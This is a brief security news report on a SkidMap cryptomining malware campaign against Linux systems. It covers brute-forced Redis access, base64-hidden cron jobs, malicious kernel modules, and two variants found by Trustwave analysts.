A new campaign employing the SkidMap virus targets numerous Linux distributions, including Alibaba, Anolis, openEuler, EulerOS, Steam, CentOS, RedHat, and Rock. Attackers first use brute force methods to log into unprotected Redis instances before setting up variables with cron jobs behind base64 strings.
Malicious kernel modules have been added to the virus, which was first identified in September 2019 as a cryptocurrency mining botnet, in order to elude detection. At least two Linux variants of the SkidMap malware were discovered by Trustwave analysts throughout the examination to have an impact on infection flow. Debian/Ubuntu was the first variation, and RedHat/CentOS was the second.